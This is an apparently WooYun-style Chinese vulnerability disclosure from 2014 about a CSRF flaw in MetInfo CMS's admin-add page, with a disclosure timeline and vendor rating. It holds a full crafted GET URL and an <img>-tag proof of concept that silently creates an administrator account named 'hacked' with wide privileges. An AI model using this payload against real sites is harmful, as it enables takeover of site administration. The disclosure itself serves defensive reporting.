漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:METINFO CSRF可添加管理员
提交时间:2014-09-15 11:49
修复时间:2014-12-14 11:50
公开时间:2014-12-14 11:50
漏洞类型:CSRF
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2014-09-15: 细节已通知厂商并且等待厂商处理中 2014-09-20: 厂商已经确认,细节仅向厂商公开 2014-09-23: 细节向第三方安全合作伙伴开放 2014-11-14: 细节向核心白帽子及相关领域专家公开 2014-11-24: 细节向普通白帽子公开 2014-12-04: 细节向实习白帽子公开 2014-12-14: 细节向公众公开
简要描述: RT
详细说明: 由于metinfo在核心部分,存在变量覆盖漏洞 (不懂是不是) 所以GET = POST , POST = GET 于是可以使用GET请求来添加管理员,且添加管理员页面没有任何TOKEN防护 我首先尝试增加个管理员,然后用BurpSuite抓包,再把POST请求拷贝下来,放入GET请求中。 构造个CSRF URL
localhost/metinfo/admin/admin/save.php ?action=add &useid=hacked &pass1=hacked &pass2=hacked &name=Hacked &sex=0 &tel= &mobile=01234567890 &email=hacked%40hacked.com &qq= &msn= &taobao= &admin_introduction= &admin_group=3 &langok_cn=cn &admin_op0=metinfo &admin_op1=add &admin_op2=editor &admin_op3=del &admin_pops1001=s1001 &admin_pops1301=s1301 &admin_pops1303=s1303 &admin_pops1304=s1304 &admin_pops1305=s1305 &admin_popc1=c1 &admin_popc2=c2 &admin_popc3=c3 &admin_popc25=c25 &admin_popc31=c31 &admin_popc32=c32 &admin_popc33=c33 &admin_popc36=c36 &admin_pop9999=9999 &admin_pops1401=s1401 &admin_pops1404=s1404 &admin_pops1407=s1407 &admin_pops1402=s1402 &admin_pops1403=s1403 &admin_pops1405=s1405 &admin_pops1406=s1406 &admin_pops1505=s1505 &admin_pops1507=s1507 &admin_pops1502=s1502 &admin_pops1503=s1503 &admin_pops1504=s1504 &admin_pops1106=s1106 &admin_pops1006=s1006 &admin_pops1501=s1501 &admin_pops1601=s1601 &admin_pops1007=s1007 &admin_pops1004=s1004 &admin_pops1005=s1005 &admin_pops1003=s1003 &admin_pops1201=s1201 &admin_pops1002=s1002 &admin_pops1101=s1101 &admin_pops1603=s1603 &Submit=%E4%BF%9D%E5%AD%98
访问此请求后,会添加个用户名和密码为 hacked的管理员
漏洞证明: 把上面的请求放到了 <img> 中 html的源码是
<img src="http://localhost/metinfo/admin/admin/save.php?action=add&useid=hacked&pass1=hacked&pass2=hacked&name=Hacked&sex=0&tel=&mobile=01234567890&email=hacked%40hacked.com&qq=&msn=&taobao=&admin_introduction=&admin_group=3&langok_cn=cn&admin_op0=metinfo&admin_op1=add&admin_op2=editor&admin_op3=del&admin_pops1001=s1001&admin_pops1301=s1301&admin_pops1303=s1303&admin_pops1304=s1304&admin_pops1305=s1305&admin_popc1=c1&admin_popc2=c2&admin_popc3=c3&admin_popc25=c25&admin_popc31=c31&admin_popc32=c32&admin_popc33=c33&admin_popc36=c36&admin_pop9999=9999&admin_pops1401=s1401&admin_pops1404=s1404&admin_pops1407=s1407&admin_pops1402=s1402&admin_pops1403=s1403&admin_pops1405=s1405&admin_pops1406=s1406&admin_pops1505=s1505&admin_pops1507=s1507&admin_pops1502=s1502&admin_pops1503=s1503&admin_pops1504=s1504&admin_pops1106=s1106&admin_pops1006=s1006&admin_pops1501=s1501&admin_pops1601=s1601&admin_pops1007=s1007&admin_pops1004=s1004&admin_pops1005=s1005&admin_pops1003=s1003&admin_pops1201=s1201&admin_pops1002=s1002&admin_pops1101=s1101&admin_pops1603=s1603&Submit=%E4%BF%9D%E5%AD%98">
然后来试试看访问下
过后看看,管理员成功被增加了!
修复方案: 漏洞回应 厂商回应: 危害等级:中
漏洞Rank:10
确认时间:2014-09-20 08:53
厂商回复:
最新状态: 暂无
漏洞评价:
评论
2015-01-20 19:43 |
蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)